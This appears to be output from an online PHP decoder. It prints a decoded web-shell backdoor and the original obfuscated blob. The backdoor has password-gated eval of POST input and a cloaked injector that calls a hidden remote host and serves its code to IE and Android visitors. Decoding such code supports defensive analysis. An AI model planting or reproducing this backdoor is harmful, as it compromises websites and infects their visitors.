Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //istart preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69..
Decoded Output download
error_reporting(0);
$_passssword = "52a12674622f5d70124e38fe9fa8fcac";
if (!@$_POST["p1"] AND @$_POST["pass"]==$_passssword) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"safemode" => @ini_get("safe_mode"),
);
echo serialize($a);
} elseif(!empty($_POST["p2"]) AND $_POST["pass"]==$_passssword) {
eval(base64_decode($_POST["p2"]));
} elseif(!empty($_POST["p1"]) AND $_POST["pass"]==$_passssword) {
eval($_POST["p1"]);
}
unset($_passssword);
$ua = @$_SERVER['HTTP_USER_AGENT'];
$url = base64_decode("aHR0cDovL2Rhenplci5zbHlpcC5jb20vb3JkcG0vP2V4cG9ydD03ZjUzZjhjNmM3MzBhZjZhZWI1MmU2NmViNzRkODUwNyZ1cmw9NDg5OTAmZz02Mw==") . "&host=" . @$_SERVER["SERVER_NAME"] . "&ip=" . @$_SERVER["REMOTE_ADDR"] . "&ua=" . base64_encode($_SERVER["HTTP_USER_AGENT"]) . "&ref=" . base64_encode(@$_SERVER["HTTP_REFERER"]);
if (
empty($echo_done)
AND
!empty($_SERVER["HTTP_REFERER"])
AND
!empty($ua)
AND
(substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125')
AND
!preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])
AND
((preg_match("/Trident\/7\.0;/i", $ua) && preg_match("/rv\:11\.0/i", $ua)) OR stristr($ua, "MSIE") OR stristr($ua, "android"))
) {
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$code = curl_exec($ch);
} elseif (function_exists("fsockopen")) {
$m = parse_url($url);
$fp = fsockopen($m["host"], 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, "GET " . $m["path"] . "?" . $m["query"] . " HTTP/1.1
Host: " . $m["host"] . "
User-Agent: PHP" . "
Connection: Close
");
$code = "";
while (!feof($fp))
$code .= fgets($fp, 100);
list($headers, $code) = explode("
", $code);
fclose($fp);
}
}
if (!empty($code) AND base64_decode($code)) {
$echo_done = true;
print base64_decode($code);
}
}
Did this file decode correctly?
Original Code
<?php //istart
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lVX9b7JIEP6dv2K7MRUSrwVa+xnv6lWu7eX1IxR7ia0hKyxCCyy3oFav/d9vFhTF9N70NjErM888O7PzsZJEOWfc5jRhPAviqawq15JUsxOSwlow7qIWwk2daPrZ+emZrntN91zV9FN6cuHRS49ceA5x8LUUeEg+uKnZg/6j9YwTDY9Ru9dBWwkQ4nGrtUutoH8kBKtG4BDCOVnK+bdYeBaTiGLU+hUlfmLnX7LS2OqFdE55GrB4g1p/VmAp8WjE3ILpJogDe0ozORfbuXwNhrDFRh2foZTygITBiso1AvJPRMOUBp58QKMkW8plSDoeK3mU3wmSzkkoT0hKz05tlzpwdJXoZwdp//ugiikwS9IsTiHwioHI9EzcPWTp0TCfDPO5fm9ZA3sIX3b7zuhZ9fE1YHgIoKrvmNybqtNh8x+66dM4CZ2guZrch4lz23yd6Op8cvLnm3Onzgf606lzd7l0O+rJ6HW4Gr36r72oe9Jd/e6PXkf+6K8HrRsN9V70FPRW5lu/M1z0liPNiRaXvc602bfa0Wil6t1Fq4UVdITwoc/SrIXh79ZvXOx2r901oPQEKkj2MabR7VuG3e50zDVmRnLMOjQar9OyMdi7DJEFYcWp94XZzZ6dafxhmIaZ33/eHkV2isyKOrNdFlMll0Ju871M/H8wfQmekapcTmeTNONyxoNoS1Xfib4+VhpIbaAzBR20UP389EjTm/U99oTTqR2RzPFlfCxPGZuGdMKyjyiNxbYkPmMfKSXc8T8mMDo+SPr2EcQufadcOQ5wA/2kqvY8liuHWTxwaZy9HJ+/HKnXBRUEiQ4PUQXH5y9XmgaYEqKgvokg9kDED4IGwt3HBwN/ISexy1ngYkWRNp0jkuTNYieDIWLTdwCnMnag+m2YGxkgAVdOlprjQ1OUWnk9QMTKhdBtLIGGc/wGuh2aP/oDy7YeukZ/aDVQ8zto2ERUPPwO2DSsodmzzHbvEYqlgbQdo5qoz42zkB5HmK71m5nzReReypw3ltC4iLxki4AqITylNvDJawe3ai8BfWkr16JnLBoWjxvoAmquBi9OzIodslHcRWktHAGG3fPE8hY8yKjQQObuDAuJ9hPMCcn8opd/24j+nlG+LGRI1N2xdqS98Jf4Hpy4Kg0LlwRI6IYw8n9pT6HortDgfoA38lsWxzS/lSt0G7KUCqH44Z3r3b1ijKvyhR+EFF5GjzIvD0ypqLemR3Bn8DKlRYyaqu4dEEJO5JpPiQuPXKMwUuBA+p6E+TwuPdsoq/aeI9zPXdgqPosSkMrq34yUgl28OHsvVq6oVEM5ycCZjM/olj3hQZx9SbAuPenzXw=='\x29\x29\x29\x3B",".");//iend
Function Calls
gzinflate | 2 |
preg_replace | 1 |
base64_decode | 2 |
Stats
MD5 | 15001c71d8f25eab5d52e5bbd50e5ba5 |
Eval Count | 3 |
Decode Time | 115 ms |